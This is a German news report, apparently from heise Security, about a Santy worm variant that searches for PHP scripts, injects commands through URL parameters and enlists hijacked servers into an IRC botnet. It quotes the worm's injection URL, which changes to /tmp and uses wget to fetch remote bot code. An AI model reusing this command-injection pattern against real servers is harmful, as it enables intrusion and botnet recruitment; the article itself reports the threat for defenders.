Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Erfahrungen

Es sind noch keine Kommentare vorhanden.

Hier Kannst Du einen Kommentar verfassen


Bitte gib mindestens 10 Zeichen ein.
Wird geladen... Bitte warte.
* Pflichtangabe

Verwandte Beiträge

PostgreSQL Beta 2 verfügbar

Das Datenbanksystem PostgreSQL ist in in der Version 8.4 Beta 2 erschienen. ...

admin

Autor : admin
Kategorie: Dies und Das

Pentium 4-Bug

Laut ZDNet kommt es zu Probleme beim der Wiedergabe von DVDs. Unter bestimmten Bedingungen hängt sich der komplette PCI-Bus aus. Dieses soll zwar nur ein kleiner Fehler sein, aber auch kleine Abstürze ist ärgerlich :) ...

admin

Autor : admin
Kategorie: Software & Web-Development

GIF-Patent bald vom Tisch

Nur noch wenige Tage, dann ist das zu zweifelhaftem Ruhm gelangte LZW-Patent der Firma Unisys endgültig Geschichte. Schon vor einem Jahr lief das US-Patent ab, heute folgt das europäische (EP 129,439 A1 ), übermorgen das japanische und am 7. Juli das kana ...

admin

Autor : admin
Kategorie: Software & Web-Development

Der Tag des schlechten Codes: Developers Shame Day

Am Morgigen Mittwoch ruft Cem Derin zum "Developers Shame Day" auf. Ein Tag, an dem jeder alten Quellcode aus der eigenen Feder rauskramt, und zeigt, dass man auch selbst mal klein Angefangen hat. ...

unset

Autor : unset
Kategorie: Software & Web-Development

Düsseldorf: Ein Quadratkilometer Rheinpromenade mit WLAN

Ab 1. Juli wird das Düsseldorfer Altstadtufer und der MedienHafen um eine Attraktion reicher: In Zusammenarbeit mit der Stadt Düsseldorf ermöglicht ISIS Multimedia Net die Nutzung eines WLAN-Internetzugangs, im kommenden Sommer 2003 ist dies sogar kostenl ...

admin

Autor : admin
Kategorie: Software & Web-Development

Neue Ausgabe von PHP Solutions – 5/2004 (6)

Die neue Ausgabe des Magayins ist ab September im Zeitschriftenhandel erhältlich. - Code-Dokumentierung mit phpDocumentor - Verwendung von Xindice mit PHP - Übertragen von Daten zwischen MySQL und XML, CSV bzw. HTML - Verwendung der PHP-Erweiterung ...

admin

Autor : admin
Kategorie: Software & Web-Development

Finde den richtigen Job
Düsseldorf, Deutschland

Pressemitteilung veröffentlichen

pressemitteilung veröffentlichen

Teile Deine News und Informationen mit anderen

Du möchtest andere User über ein interessantes IT-Thema informieren, dann melde Dich jetzt an und teile es mit unserer PHP-Community

mehr erfahren

Angebot eintragen